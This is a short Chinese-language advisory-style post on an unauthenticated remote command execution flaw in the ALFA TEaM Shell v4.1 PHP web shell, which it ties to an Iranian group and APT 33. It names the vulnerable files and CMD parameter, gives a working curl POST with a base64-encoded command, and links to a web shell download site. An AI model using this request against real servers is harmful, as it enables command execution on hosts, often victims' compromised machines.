反制恶意软件ALFA TEAM SHELL TESLA 之 RCE

ALFA TEaM Shell ~ v4.1

一个发布新版本 PHP web shell 的组织是ALFA TEaM，这是一个可疑的伊朗组织，该组织创建了ALFA TEaMShell等网络恶意软件，过去曾被APT 33等针对能源和航空航天行业的威胁行为者使用过在过去。如果您有兴趣，FireEye 已经记录了对APT 33组战术的详细分析。

供应​​商主页：http://solevisible.com

软件链接：https://phpshells.com/alfa-tesla-v4-1-shell

版本：v4.1

测试：Windows 10 Enterprise x64，Linux

[关于-阿尔法团队壳牌特斯拉]：

它是黑客使用的最流行的 web shell 之一，他们用它来访问服务器端。

[易受攻击的文件]：

1 . perl.alfa

2 . bash.alfa

3 . py.alfa

[易受攻击的参数]：CMD

[描述]： #执行命令无需身份验证或登录web shell， To use，只找到一个易受攻击的文件，

Convert your commands to base64 and Submit your request using the CMD parameter and the POST method.

curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa